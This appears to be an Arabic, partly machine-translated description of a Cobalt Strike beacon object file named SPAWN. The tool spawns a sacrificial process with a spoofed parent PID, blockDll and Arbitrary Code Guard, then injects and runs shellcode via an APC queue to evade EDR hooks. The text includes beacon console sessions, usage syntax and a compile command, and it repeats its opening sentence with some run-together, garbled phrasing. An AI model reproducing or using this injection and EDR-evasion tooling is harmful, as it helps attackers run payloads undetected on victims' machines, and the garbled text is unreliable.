
BOF من Cobalt Strike يقوم بتوليد عملية تضحية، وحقنها بـ shellcode، وتنفيذ الحمولة. مبني لتفادي خطافات EDR/UserLand عن طريق توليد عملية تضحية مع Arbitrary Code Guard (ACG) و BlockDll و PPID spoofing.
BOF لكولت سترايك يقوم بإنشاء عملية تضحية، وحقنها بشيل كود، وتنفيذ الحمولة. مبني لتجاوز خطافات EDR/UserLand عن طريق إنشاء عملية تضحية مع حماية الكود التعسفي (ACG)، وBlockDll، وتزييف PPID.

beacon> spawn notepad.exe 6248 /Users/bobby.cooke/git/boku7/SPAWN/popCalc.bin
[*] SPAWN (Bobby Cooke//SpiderLabs|@0xBoku|github.com/boku7)
[+] Opened handle 0x534 to process 6248(PID)
[+] Spawned process: notepad.exe | PID: 8404 | PPID: 6248
[+] Allocated RE memory in remote process 8404 (PID) at: 0x00000177A72C0000
[+] Wrote 280 bytes to memory in remote process 8404 (PID) at 0x00000177A72C0000
[+] APC queued for main thread of 8404 (PID) to shellcode address 0x00000177A72C0000
beacon> help
spawn Spawn a process with a spoofed PPID and blockDll
beacon> help spawn
Synopsis: spawn /path/to/exe PPID
beacon> ps
8264 5536 OneDrive.exe x86 1 DESKTOP-KOSR2NO\boku
beacon> spawn cmd.exe 8264
[*] SPAWN (@0xBoku|github.com/boku7)
Opened handle 0x634 to process 8264(PID)
Success! Spawned process: cmd.exe | PID: 5384 | PPID: 8264
blockdll المشابهة لكولت سترايكx86_64-w64-mingw32-gcc -c spawn.x64.c -o spawn.x64.o
beacon> spawn /path/to/exe PPID /local/path/to/shellcode.bin

cmd.exe الخاصة بنا تم إنشاؤها مع PPID كـ OneDrive.exeblockdll في كولت سترايك لمنع تحميل DLLs غير الموقعة من مايكروسوفت في ذاكرة العملية المنشأة
التوقيعات مقيدة (مايكروسوفت فقط)التوقيعات مقيدة (مايكروسوفت فقط) تجعل DLLs غير الموقعة من مايكروسوفت لا يمكن تحميلها في عمليتنا المنشأة
